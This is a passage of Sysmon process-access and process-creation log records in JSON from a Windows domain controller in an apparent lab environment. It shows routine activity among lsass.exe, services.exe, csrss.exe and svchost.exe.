05:46:39.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.179\r\nProcessGuid: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nProcessId: 2240\r\nImage: C:\\Windows\\System32\\svchost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for Windows Services\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: svchost.exe\r\nCommandLine: C:\\Windows\\System32\\svchost.exe -k smbsvcs\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.179","ProcessGuid":"{A837DB8D-01BF-5F25-0000-0010F1980200}","Image":"C:\\Windows\\System32\\svchost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for Windows Services","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"svchost.exe","CommandLine":"C:\\Windows\\System32\\svchost.exe -k smbsvcs","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1184\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1184","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.219\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.219","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.219\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.219","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.219\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 